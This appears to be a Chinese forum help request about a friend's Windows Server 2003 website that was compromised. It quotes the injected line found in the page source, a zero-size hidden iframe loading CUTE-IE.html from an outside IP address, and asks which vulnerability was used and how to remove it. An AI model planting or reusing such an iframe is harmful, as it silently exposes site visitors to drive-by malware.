我朋友一网站这两天被挂马,现像是:客户访问该网站,306会拦截一个访问.
网站服务器是MS2003系统,查网站服务器,现有的安全软件查不出病毒,也没有系统漏洞.
查看客户端登录网站源码,发现多了一行代码:<iframe src=
http://218.95.124.4:81/CUTE-IE.html width=0 height=0></iframe>
请教这是利用什么漏洞挂的码,怎么解决这个问题.
谢谢!
用户系统信息:Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; InfoPath.2; .NET CLR 1.1.4322)